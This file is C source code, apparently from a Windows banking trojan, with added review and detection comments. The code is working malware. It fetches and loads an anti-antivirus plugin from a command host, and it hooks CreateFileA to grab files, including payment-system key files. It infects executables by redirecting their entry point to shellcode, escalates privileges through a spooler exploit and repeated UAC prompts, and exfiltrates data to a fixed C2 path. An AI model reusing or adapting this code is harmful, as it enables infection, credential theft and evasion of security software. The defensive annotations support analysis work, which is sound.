// Deletes Internet Explorer cookie files (*.txt) from the current user's cookie folder.
// os selects the profile layout:
//   1 -> "C:\Documents and Settings\<user>\Cookies\"                       (XP-style)
//   2 -> "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Cookies\"     (Vista+ style)
// Any other value returns -1; a failed GetUserNameA returns 0; otherwise 0 after DeleteFiles.
// The directory is handed to DeleteFiles with the "*.txt" mask and hCab; given the HCAB type the
// matching files are presumably packed into that cabinet before removal — confirm in DeleteFiles.
// Forensics: the two directories above are the only on-disk locations this routine touches.
int DeleteIECookies(int os, HCAB hCab)
{
    char username[256];
    DWORD name_len = 256;
    // name_len is in/out; on success GetUserNameA sets it to the copied length including the
    // terminator, and that value feeds the allocation sizes below.
    if(!(BOOL)pGetUserNameA(&username[0], &name_len))
        return 0; //return 10;
    char *Path_cookies = NULL;
    switch(os)
    {
    case 1:
        // NOTE(review): the size counts "\\Cookies" but the code appends "\\Cookies\\" plus a NUL,
        // so the buffer appears one byte short of what is written.
        Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies"));
        m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\");
        m_lstrcat(Path_cookies,&username[0]);
        m_lstrcat(Path_cookies,"\\Cookies\\");
        break;
    case 2:
        // NOTE(review): same off-by-one as case 1 (the trailing '\\' is not counted).
        Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies"));
        m_lstrcpy(Path_cookies,"C:\\Users\\");
        m_lstrcat(Path_cookies,&username[0]);
        m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\");
        break;
    default:
        return -1;
    }
    // Path_cookies is never released: the MemFree calls only survive in the commented-out loop below.
    DeleteFiles(Path_cookies, "*.txt", true, false, hCab);
    /* Earlier hand-rolled FindFirstFile/DeleteFile loop, superseded by DeleteFiles and left disabled by the author:
    if(Path_cookies == NULL) return -1;
    WIN32_FIND_DATA data;
    char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2);
    m_lstrcpy(Path_cookies_find,Path_cookies);
    m_lstrcat(Path_cookies_find,"\\*");
    HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data);
    if(nFindFile==NULL) return -1;
    do {
        if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue;
        char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1);
        m_lstrcpy(Path_file,Path_cookies);
        m_lstrcat(Path_file,"\\");
        m_lstrcat(Path_file,data.cFileName);
        if(!DeleteFile(Path_file)) { DWORD err = pGetLastError(); }
        //MemFree(Path_file);
    } while(FindNextFile(nFindFile,&data));
    FindClose(nFindFile);
    //MemFree(Path_cookies);*/
    return 0;
}
// Builds the "driver step" status-report URL into UrlBuffer.
// The URL is settings->StatUrl immediately followed by the '&'-joined parameters
// cmd=step, uid=<GenerateUidAsString(StatPrefix)>, step=170_dr.
// Returns false when reporting is disabled or when UrlBuffer is too small; true otherwise.
// Network note: the query string "cmd=step&uid=...&step=170_dr" appended to StatUrl is the
// observable beacon format for this report and can be matched in proxy/IDS logs.
bool GetDriverUrl(char * UrlBuffer, DWORD UrlBufferSize)
{
    DebugReportSettings* settings = DebugReportGetSettings();
    DBGRPTDBG("GetDriverUrl", "Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'", settings->Enabled, settings->StatPrefix, settings->StatUrl );
    // NOTE(review): settings is not released on this early return; DebugReportFreeSettings is
    // only reached on the success path.
    if (!settings->Enabled)
        return false;
    string BotUid = GenerateUidAsString(settings->StatPrefix);
    m_memset(UrlBuffer, 0, UrlBufferSize);
    PStrings Fields = Strings::Create();
    AddURLParam(Fields, "cmd", "step");
    AddURLParam(Fields, "uid", BotUid.t_str());
    AddURLParam(Fields, "step", "170_dr"); //170_dr driver timer
    PCHAR Params = Strings::GetText(Fields, "&");
    PCHAR URL = STR::New(2, settings->StatUrl, Params);
    DBGRPTDBG("GetDriverUrl", "Url='%s':%u (buffer_size=%u)", URL, STR::Length(URL), UrlBufferSize);
    // NOTE(review): the bound admits a buffer up to two bytes shorter than the string plus
    // terminator that m_lstrcpy writes below; URL, Params, Fields and settings also leak here.
    if (UrlBufferSize < (STR::Length(URL) - 1))
        return false;
    m_lstrcpy(UrlBuffer, URL);
    STR::Free(URL);
    STR::Free(Params);
    Strings::Free(Fields);
    DebugReportFreeSettings(settings);
    return true;
}
// Thread entry: fetches the "stop AV" plugin from the current host and loads it in memory.
// Does nothing when the file at GetStopAVPath() already exists (acts as a "done" marker).
// The URL is <GetCurrentHost()> + "/cfg/stopav.plug"; the path literal is assembled from a
// char array rather than a string constant. DownloadInMem is retried every 5 minutes until it
// succeeds, so the thread never exits while the download keeps failing.
// On-disk artifact: the raw (still encrypted) download is written to GetMiniAVPath().
// The decrypted image is loaded with MemoryLoadLibrary and unloaded immediately, so any effect
// must happen during the load itself (presumably its DllMain — confirm against the loader).
// Always returns 0; lpData is unused.
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
    if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
    {
        return 0;
    }
    char *Host = GetCurrentHost();
    if ( Host == NULL )
    {
        return 0;
    }
    char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};
    // NOTE(review): fixed 256-byte stack buffer; Host's length is not checked before the copy.
    char AvBlockUrl[256];
    m_lstrcpy( AvBlockUrl, Host );
    m_lstrcat( AvBlockUrl, AvBlockFile );
    LPBYTE BotModule = NULL;
    DWORD dwModuleSize = 0;
    // Unbounded retry loop: 5-minute back-off between attempts, no attempt limit.
    while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) )
    {
        pSleep( 1000 * 60 * 5 );
    }
    if ( BotModule != NULL && dwModuleSize )
    {
        // Persist the downloaded bytes as-is before decrypting them.
        LPVOID FileData = MemAlloc( dwModuleSize + 1 );
        if ( FileData )
        {
            m_memcpy( FileData, BotModule, dwModuleSize );
            File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
            MemFree( FileData );
        }
        LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );
        if ( Module )
        {
            // Loaded without the Windows loader (no file mapping, no loaded-module list entry
            // is visible here — confirm MemoryLoadLibrary's behaviour in its own source).
            HMEMORYMODULE hLib = MemoryLoadLibrary( Module );
            if ( hLib == NULL )
            {
                return 0;
            }
            MemoryFreeLibrary( hLib );
        }
    }
    // NOTE(review): BotModule and Module are never freed on any path.
    return 0;
}
// Detour for CreateFileA: calls the real function, then reports the open as a ParamEvent
// through SendEvent unless (a) the grabber state has IGNOREHOOK set, (b) the open uses
// FILE_FLAG_OVERLAPPED, or (c) the name starts with '/' or '\\' (author's note: skips the
// opening of various ports, i.e. device-style paths). The real handle is returned unchanged,
// so the hooked process observes no functional difference.
// Detection note: the Real_CreateFileA/Hook_CreateFileA pair is the shape of a trampoline-style
// API hook; comparing kernel32!CreateFileA's in-memory prologue or the IAT entry against the
// on-disk image reveals it.
HANDLE WINAPI Hook_CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode,
                                LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition,
                                DWORD dwFlagsAndAttributes, HANDLE hTemplateFile )
{
    HANDLE File = Real_CreateFileA(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile );
    if( (stateGrabber & IGNOREHOOK) == 0 && (dwFlagsAndAttributes & FILE_FLAG_OVERLAPPED) == 0 && lpFileName && lpFileName[0] != '/' && lpFileName[0] != '\\' ) //ignore the opening of various ports
    {
        //DBG("FileGrabberA", "%s", lpFileName);
        //initialise the event parameters
        ParamEvent e;
        e.data = 0;
        e.szData = 0;
        // NOTE(review): unbounded copy; e.fileNameA's capacity is not visible here — confirm it
        // can hold the longest name CreateFileA accepts.
        m_lstrcpy( e.fileNameA, lpFileName );
        e.unicode = false;
        e.access = dwDesiredAccess;
        e.file = File;
        SendEvent(e); //send the event
    }
    return File;
}
// Patches an in-memory PE image (data/dataSize, raw file layout) so that its entry point runs
// the embedded Shellcode, which is parameterised with dllPath and an optional commandLine.
// Written at the start of the ".rsrc" section's raw data:
//   [SHELLCODE_PARAMS] ... then, at offset sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1, [Shellcode]
// SHELLCODE_PARAMS receives the original AddressOfEntryPoint and the resolved addresses of
// LoadLibraryA and WinExec; presumably the shellcode uses them on szDllPath/szCommandLine and
// then continues to the saved entry point — the shellcode body itself is not on this page.
// Afterwards AddressOfEntryPoint is redirected to the shellcode's RVA, the section is marked
// IMAGE_SCN_MEM_EXECUTE, the resource data directory is zeroed, and the PE checksum is recomputed.
// Returns false only when .rsrc is smaller than totalSize; returns true once the section is
// patched — and also when no ".rsrc" section exists at all (the loop simply runs out).
// Detection heuristics that follow directly from what is written here: entry point located
// inside .rsrc, an executable .rsrc section, an empty resource directory on an image that still
// carries resource bytes, and a checksum that validates (so a checksum test alone will not flag it).
// NOTE(review): "§ion->Name" in the loop is this page's rendering of "&section->Name" (an
// HTML-entity mangling of "&sect"); it is kept as-is here.
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine )
{
    DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode);
    DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
    DBG( "Shellcode size is %d bytes", totalSize);
    // NOTE(review): e_lfanew, SizeOfOptionalHeader and NumberOfSections are trusted without
    // bounds checks against dataSize; a malformed input is read past its end.
    PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS) ((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew);
    PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER) (headers->FileHeader.SizeOfOptionalHeader + (PUCHAR)&headers->OptionalHeader);
    DWORD numberOfSections = headers->FileHeader.NumberOfSections;
    // enumerate sections
    for( int i = 0; i < (int)numberOfSections; i++ )
    {
        // check for resources section
        if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) )
        {
            if( section->SizeOfRawData < totalSize )
            {
                DBG( "ERROR: Not enough free space in '.rsrc'" );
                return false;
            }
            // fill shellcode parameters (overwrites the beginning of the resource data)
            PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData);
            m_memset( params, 0, sizeof(SHELLCODE_PARAMS) );
            params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint;
            HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll");
            params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" );
            params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" );
            // NOTE(review): both copies are unbounded; szCommandLine/szDllPath sizes are not visible here.
            if( commandLine )
                m_lstrcpy( params->szCommandLine, commandLine );
            m_lstrcpy( params->szDllPath, dllPath );
            // copy shellcode
            PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1);
            m_memcpy( shellcode, Shellcode, shellcodeSize);
            // replace address of entry point (same offset from the section start as the copy above)
            headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
            // make section executable
            section->Characteristics |= IMAGE_SCN_MEM_EXECUTE;
            // drop the resource directory entry; the bytes stay in the file but are no longer referenced
            headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL;
            headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0;
            DWORD headerSum = 0, checkSum = 0;
            // recalculate checksum
            if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) )
                headers->OptionalHeader.CheckSum = checkSum;
            else
                DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() );
            DBG( "OK" );
            break;
        }
        section++;
    }
    return true;
}
// true - if the file is a key file.
// File-grabber callback. As written it performs no check of the file at all: every event it
// receives gets its upload name set to "file.key" and the grabber is told to send the file and
// stop the receiver. Any filtering therefore has to happen where this callback is registered
// (not on this page); the DBG tag "Cyberplat" suggests which application's files are meant.
static int GrabKeyFiles( FileGrabber::ParamEvent* e )
{
    DBG( "Cyberplat", "File: %s", e->fileName );
    m_lstrcpy( e->nameSend, "file.key" );
    return FileGrabber::SENDFILE | FileGrabber::STOPRECEIVER;; // stray second ';' in the original
}
/************************************************************************/
//* Author's note: a MemAlloc-paired memory clean-up still needs to be added to this procedure */
// Deletes Internet Explorer cookies through the WinINet URL-cache API.
//   bDeleteCookiesIndex: delete the cookie index.dat first; if bDeleteCookies is FALSE, stop there.
//   bDeleteCookies:      enumerate the "cookie:" cache entries and DeleteUrlCacheEntry each one.
// Returns TRUE when the enumeration ends with ERROR_NO_MORE_ITEMS (or after the index-only path),
// FALSE on any other enumeration error.
// NOTE(review): the index.dat path derived from %userprofile% is dead code — it is overwritten by
// the hard-coded "C:\Users\User\...\Cookies\index.dat" literal right before the delete, so on any
// account other than "User" the index delete silently targets the wrong path.
// NOTE(review): the buffer-too-small retry of FindFirstUrlCacheEntryA passes NULL as the pattern
// instead of "cookie:", so that retry enumerates and deletes every cache entry, not only cookies.
BOOL Delete_IECookies_Norm(BOOL bDeleteCookies, BOOL bDeleteCookiesIndex)
{
    DbgMsg("Delete_IECookies_Norm",0,"START");
    char szUserProfile[200];
    char szFilePath[200];
    HANDLE hCacheEnumHandle = NULL;
    LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
    DWORD dwSize = 4096; // initial buffer size

    // Delete index.dat if requested. Be sure that index.dat is not locked.
    if(bDeleteCookiesIndex)
    {
        // Retrieve from environment user profile path.
        pExpandEnvironmentStringsA("%userprofile%", &szUserProfile[0], sizeof(szUserProfile));
        m_memset(&szFilePath[0], 0, sizeof(szFilePath));
        //m_memcpy(&szFilePath[0],&szUserProfile[0], m_wcslen(&szUserProfile[0])*sizeof(WCHAR));
        //m_memcpy(&szFilePath[m_wcslen(&szUserProfile[0])],L"\\Cookies\\index.dat", 36);
        m_lstrcpy(&szFilePath[0], &szUserProfile[0]);
        m_lstrcat(&szFilePath[0], "\\Cookies\\index.dat");
        // wsprintfW(szFilePath, L"%s%s", szUserProfile, L"\\Cookies\\index.dat");
        // The line below discards the path built above (see the note in the header comment).
        m_lstrcpy(&szFilePath[0], "C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat");
        pDeleteFileA(szFilePath);
        DbgMsg("Delete_IECookies_Norm",0,&szFilePath[0]);
        DWORD err = pGetLastError();
        DbgMsg("Delete_IECookies_Norm",err,"pDeleteFileW"); // message names the W variant; the A variant is what is called
        if(!bDeleteCookies)
            return TRUE;
    }

    // Enable initial buffer size for cache entry structure.
    //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
    lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
    lpCacheEntry->dwStructSize = dwSize;

    // URL search pattern (1st parameter) options are: "cookie:", "visited:",
    // or NULL ("*.*").
    hCacheEnumHandle = pFindFirstUrlCacheEntryA(_T("cookie:") /* in */, lpCacheEntry /* out */, &dwSize /* in, out */);

    // First, obtain handle to internet cache with FindFirstUrlCacheEntry
    // for later use with FindNextUrlCacheEntry.
    if(hCacheEnumHandle != NULL)
    {
        pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
        DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
    }
    else
    {
        switch(pGetLastError())
        {
        case ERROR_INSUFFICIENT_BUFFER:
            MemFree(lpCacheEntry);
            //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
            lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
            lpCacheEntry->dwStructSize = dwSize;
            // Repeat first step search with adjusted buffer, exit if not
            // found again (in practice one buffer's size adjustment is
            // always OK).  Note the pattern is NULL here, not "cookie:".
            hCacheEnumHandle = pFindFirstUrlCacheEntryA(NULL, lpCacheEntry, &dwSize);
            if(hCacheEnumHandle != NULL)
            {
                pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
                DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
                break;
            }
            else
            {
                // FindFirstUrlCacheEntry fails again, return.
                MemFree(lpCacheEntry);
                return FALSE;
            }
        default:
            // hCacheEnumHandle is still NULL on this path.
            pFindCloseUrlCache(hCacheEnumHandle);
            MemFree(lpCacheEntry);
            return FALSE;
        }
    }

    // Next, use hCacheEnumHandle obtained from the previous step to delete
    // subsequent items of cache.
    do
    {
        // Notice that return values of FindNextUrlCacheEntry (BOOL) and
        // FindFirstUrlCacheEntry (HANDLE) are different.
        if((BOOL)pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize))
        {
            pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
            DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
        }
        else
        {
            switch(pGetLastError())
            {
            case ERROR_INSUFFICIENT_BUFFER:
                //lpCacheEntry =
                //(LPINTERNET_CACHE_ENTRY_INFO);
                MemFree(lpCacheEntry);
                //new char[dwSize];
                lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
                lpCacheEntry->dwStructSize = dwSize;
                // Repeat next step search with adjusted buffer, exit if
                // error comes up again (in practice one buffer's size
                // adjustment is always OK).
                if(pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize))
                {
                    pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
                    DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
                    break;
                }
                else
                {
                    // FindNextUrlCacheEntry fails again, return.
                    pFindCloseUrlCache(hCacheEnumHandle);
                    MemFree(lpCacheEntry);
                    return FALSE;
                }
                break;
            case ERROR_NO_MORE_ITEMS:
                // Normal end of enumeration: the only TRUE exit of the loop.
                pFindCloseUrlCache(hCacheEnumHandle);
                MemFree(lpCacheEntry);
                return TRUE;
            default:
                pFindCloseUrlCache(hCacheEnumHandle);
                MemFree(lpCacheEntry);
                return FALSE;
            }
        }
    }
    while (TRUE);
    return FALSE; // never here
}
// Function that is called when injected into other processes.
// Checks its own privileges and tries to extend them; then drives the installer (ExplorerMain)
// through several escalation attempts and finally deletes the dropper. Always returns 0.
// Sequence visible on this page:
//   1. UnhookDlls() and BuildImport() on the current image base.
//   2. If not admin: TakePrivileges(); a result of 0 or 2 clears bRun (values are opaque here).
//   3. ExplorerMain(); if it fails while bRun is set and no exploit was tried, TakePrivileges() again and retry.
//   4. Still not installed, running as an EXE, Windows 5.x (XP): extract the "DROPER_DLL" section to
//      a temp file and hand it to SpoolerBypass() (the author's comment calls this the spooler exploit).
//   5. Still not installed and a "DROPER_NAME_PREFIX" section exists: copy FileToDelete to
//      "<tmpdir>\<prefix><tmpname>.exe", write "<that path>.manifest" via SaveManifest(), and
//      ShellExecuteExA it with ARGV_UAC_RUN up to 10 times; repeat the whole step until PathBkFile exists.
//   6. Third ExplorerMain(), then DeleteDropper on its own thread; ExitProcess(0) if dwExplorerSelf.
// Host artifacts a responder can look for: the prefixed temp-directory executables and their
// ".manifest" sidecars from step 5, the temp DLL from step 4, and repeated UAC consent prompts
// for an executable living in the temp directory.
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
    //
    // Create a separate thread for deletion since the dropper can take more than a minute to delete.
    //
    BOOL bRun = TRUE;
    BOOL bRet = FALSE;
    BOOL IsUsedExploit = FALSE;
    OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
    UnhookDlls();
    BuildImport((PVOID)GetImageBase());
    PP_DPRINTF(L"ExplorerRoutine: started");
    if (! IsUserAdmin() )
    {
        PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
        switch ( TakePrivileges() )
        {
        case 0:
        case 2:
            bRun = FALSE;
            break;
        };
        PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
        IsUsedExploit = TRUE; // In theory this is always TRUE
    };
    if ( bRun )
    {
        PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
        bRet = ExplorerMain();
        PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
    }
    /* If we have admin rights but did not use exploits and the install failed,
       use exploits and do the install again */
    if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
    {
        PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
        IsUsedExploit = TRUE;
        switch ( TakePrivileges() )
        {
        case 0:
        case 2:
            bRun = FALSE;
            break;
        };
        if ( bRun )
        {
            PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
            bRet = ExplorerMain();
            PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
        }
    };
    pGetVersionExA(&OSVer);
    /* Drop the DLL to disk and use the spooler exploit, XP only */
    if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
    {
        PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
        DWORD DropSize = 0;
        PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
        if ( DropImage && DropSize)
        {
            // The temp file written here is never deleted on this page.
            PCHAR DropFile = File::GetTempNameA();
            File::WriteBufferA(DropFile,DropImage,DropSize);
            SpoolerBypass(DropFile);
            STR::Free(DropFile);
        };
    };
    /* Launch a copy of the dropper repeatedly, asking for elevated rights. */
    if ( bRet == FALSE )
    {
        PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
        PCHAR tmpexe,dir,file ;
        PCHAR tmp_manifest;
        PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
        if ( NamePrefix )
        do
        {
            tmpexe = File::GetTempNameA();
            tmp_manifest = STR::Alloc(MAX_PATH+1);
            dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
            file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
            if ( tmp_manifest && dir && file)
            {
                STR::Free(tmpexe);
                tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
                // NOTE(review): this return skips the frees below and the dropper deletion at the end.
                if ( ! tmpexe )
                    return 0;
                m_lstrcpy(tmp_manifest,tmpexe);
                m_lstrcat(tmp_manifest,".manifest");
            };
            if ( tmpexe && tmp_manifest )
            if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
            {
                DWORD dwCode = -1;
                // NOTE(review): ExecInfo is not zero-initialised; only cbSize, lpFile, lpParameters
                // and fMask are set, the remaining members carry whatever was on the stack.
                SHELLEXECUTEINFOA ExecInfo;
                // tmp_manifest is reused here as the parameter string "<tmpexe> <ARGV_UAC_RUN>".
                m_lstrcpy(tmp_manifest,tmpexe);
                m_lstrcat(tmp_manifest," ");
                m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
                ExecInfo.cbSize = sizeof(ExecInfo);
                ExecInfo.lpFile = tmpexe;
                ExecInfo.lpParameters = tmp_manifest;
                ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
                // Up to 10 prompts per copy; a child exit code of 0 ends the inner loop.
                for ( int i = 0; i < 10; ++i )
                {
                    PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
                    if ( pShellExecuteExA(&ExecInfo) == FALSE )
                        break;
                    pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
                    pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
                    // ExecInfo.hProcess is never closed (SEE_MASK_NOCLOSEPROCESS was requested).
                    if ( dwCode == 0 )
                    {
                        PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
                        break;
                    }
                }
            };
            if ( tmpexe ) STR::Free(tmpexe);
            if ( tmp_manifest ) STR::Free(tmp_manifest);
            if ( dir ) STR::Free(dir);
            if ( file ) STR::Free(file);
        }
        while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, loop until the bootkit file appears
        if ( NamePrefix ) STR::Free(NamePrefix);
    };
    /* If the install was unsuccessful, try again — maybe it works this time */
    if ( bRet == FALSE)
    {
        PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
        bRet = ExplorerMain();
        PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
    }
    /* Delete the dropper */
    PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
    // The thread handle is closed right away; DeleteDropper keeps running independently.
    pCloseHandle(StartThread(DeleteDropper,NULL));
    if ( dwExplorerSelf )
    {
        PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
        pExitProcess(0);
    }
    return 0;
}
// Posts Buffer to the active host over plain HTTP (port 80).
// Request shape: "POST /get/tra.html HTTP/1.1" with Host, User-Agent (from ObtainUserAgentString),
// "Content-Type: application/x-www-form-urlencoded", and the body "id=<uid>&data=<URLEncode(Buffer)>".
// Returns the MySend result; false (returned as 0) when no host is active or an allocation fails.
// Network note: the fixed path "/get/tra.html" plus the "id=...&data=..." form body is a stable
// signature for this upload in proxy logs or an IDS rule.
// NOTE(review): wsprintfA is resolved at run time by hash (GetProcAddressEx(NULL, 3, 0xEA3AF0D7))
// rather than through an import, so it does not appear in the import table.
bool SendTradeInfo( char *Buffer )
{
    string Serv = GetActiveHost();
    if ( Serv.IsEmpty())
        return 0;
    // NOTE(review): fixed 30-byte buffer; the host string is copied without a length check.
    char Host[30];
    m_lstrcpy( Host, Serv.t_str());
    char Script[] = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0};
    char Args[] = "id=%s&data=%s";
    char Request[] = "POST %s HTTP/1.1\r\n"
                     "Host: %s\r\n"
                     "User-Agent: %s\r\n"
                     "Accept: text/html\r\n"
                     "Connection: Close\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Content-Length: %d\r\n\r\n";
    char Uid[100];
    GenerateUid( Uid );
    // NOTE(review): Data (the URLEncode result) is never freed on any path.
    char *Data = URLEncode( Buffer );
    char *PartReq = (char*)MemAlloc( 1024 );
    typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
    fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
    if ( PartReq == NULL )
    {
        return false;
    }
    // Body: "id=<uid>&data=<encoded buffer>" into a 1024-byte buffer; Data's length is not checked.
    _pwsprintfA( PartReq, Args, Uid, Data );
    char *Header = (char*)MemAlloc( 1024 );
    if ( Header == NULL )
    {
        MemFree( PartReq );
        return false;
    }
    char *UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    // Content-Length covers PartReq only; the trailing "\r\n" appended below is not counted.
    _pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) );
    MemFree( UserAgent );
    char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 );
    if ( SendBuffer == NULL )
    {
        MemFree( PartReq );
        MemFree( Header );
        return false;
    }
    m_lstrcpy( SendBuffer, Header );
    m_lstrcat( SendBuffer, PartReq );
    m_lstrcat( SendBuffer, "\r\n" );
    MemFree( Header );
    MemFree( PartReq );
    // NOTE(review): unlike AsyncDownload1, the MyConnect result is not checked before sending.
    SOCKET Socket = MyConnect( Host, 80 );
    bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) );
    pclosesocket( Socket );
    MemFree( SendBuffer );
    return Ret;
}
// Downloads Url over raw sockets with a hand-built HTTP/1.1 GET and returns the response body.
// On success *lpBuffer receives the buffer from RecvAndParse (owned by the caller from then on)
// and *dwSize its length; returns false on WSAStartup/ParseUrl/connect/send/receive failure.
// Network note: the header block is fixed and unusual — "Accept: */* " with a trailing space and a
// leading space on the next header, "Accept-Language: ru ", "UA-CPU: x86 ", and three CRLFs after
// "Connection: Close" — which makes it a reliable fingerprint for network detection.
// NOTE(review): resource handling is uneven: WSACleanup is never called; Host and Path are leaked
// when MyConnect fails; Path's free is commented out on the success path; the socket is only closed
// when RecvAndParse fails; and when dwSize is NULL the received buffer is leaked and false returned.
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
    WSADATA wsa;
    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }
    char *Host = NULL;
    char *Path = NULL;
    int Port = 80;
    if ( !ParseUrl( Url, &Host, &Path, &Port ) )
    {
        return false;
    }
    SOCKET Socket = MyConnect( Host, Port );
    if( Socket == -1 )
    {
        return false;
    }
    char *UserAgent = NULL;
    UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
